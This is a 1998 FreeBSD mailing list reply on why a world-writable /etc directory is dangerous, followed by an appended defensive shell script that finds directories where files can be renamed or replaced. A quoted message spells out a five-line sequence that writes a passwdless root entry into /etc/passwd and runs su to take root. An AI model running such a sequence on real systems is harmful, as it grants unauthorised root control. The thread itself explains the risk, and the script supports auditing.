Date:      Fri, 18 Dec 1998 08:50:26 -0600
From:      Jon Hamilton <hamilton@pobox.com>
To:        "Bond, Jeffery" <Jeff.Bond@nectech.co.uk>
Cc:        "'FreeBSD questions'" <questions@FreeBSD.ORG>, "'cjc@cc942873-a.ewndsr1.nj.home.com'" <cjc@cc942873-a.ewndsr1.nj.home.com>
Subject:   Re: Basic Security Question 
Message-ID:  <199812181453.GAA16474@hub.freebsd.org>
In-Reply-To: Your message of "Fri, 18 Dec 1998 09:54:54 GMT." <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk> 


In message <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>, "Bond, Jeffery" wrote:
} >Mark Ovens wrote,
} >
} >> and on all the Sparcs running SunOS4.1.3_U1 here are:
} >> 
} >> gppsun4:/{8}% ls -ldug etc
} >> drwxrwsrwx 10 bin      staff        2048 Dec 17 09:30 etc
} >> 
} >> which is even less secure as it's writable by all!
} >
} >I may be dense. Is that some kind of joke or something? As dense as I
} >am, I know for sure that even I could take any account on a system
} >with permissions like that and have control of root in this many
} >keystrokes:
} >
} >% cd /etc
} >% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
} >% mv passwd passwd.old
} >% mv passwd.new passwd
} >% su
} >#
} 
} Just because the directory is writable, this doesn't mean the existing files
} in it are too. You won't be able to do 'mv passwd passwd.old'. 

That's a common misconception.  To move (or remove) a file, all you need 
is write and execute permission for the directory containing the file.  
Try it yourself and see.

-- 
   Jon Hamilton  
   hamilton@pobox.com
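
Added example, not part of the original message: a shell audit built on the rule stated in the reply above, that renaming or removing a file is governed by the write and search bits of its directory. The function names are made up for this example, and -mindepth/-maxdepth are GNU/BSD find extensions rather than POSIX.

```shell
#!/bin/sh
# Example added to this archive page; not code from the thread.
# Rename and unlink are checked against the directory's mode, so a file
# with a restrictive mode is still replaceable when its directory is
# writable and searchable by others. The sticky bit (01000) on a directory
# limits rename/unlink to the owner of the file or of the directory, so
# sticky directories such as /tmp are left out of the report.

# replaceable_dirs ROOT
# Prints "<class> <path>" for each directory under ROOT where:
#   world - other has write+search (o+wx) and the sticky bit is clear
#   group - group has write+search (g+wx), other does not, sticky clear
replaceable_dirs() {
    find "$1" -type d -perm -0003 ! -perm -1000 \
        -exec printf 'world %s\n' {} +
    find "$1" -type d -perm -0030 ! -perm -0003 ! -perm -1000 \
        -exec printf 'group %s\n' {} +
}

# exposed_files ROOT
# Prints regular files that are not world-writable themselves but sit
# directly inside a world-replaceable directory, i.e. files whose own
# mode gives a false sense of protection.
exposed_files() {
    find "$1" -type d -perm -0003 ! -perm -1000 -exec sh -c '
        for d; do
            find "$d" -mindepth 1 -maxdepth 1 -type f ! -perm -0002 -print
        done' sh {} +
}

# Stand-alone use: audit.sh /some/tree
if [ "$#" -gt 0 ]; then
    replaceable_dirs "$1"
    exposed_files "$1"
fi
```

The checks read mode bits only, so the report is the same whether or not it is run as root.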

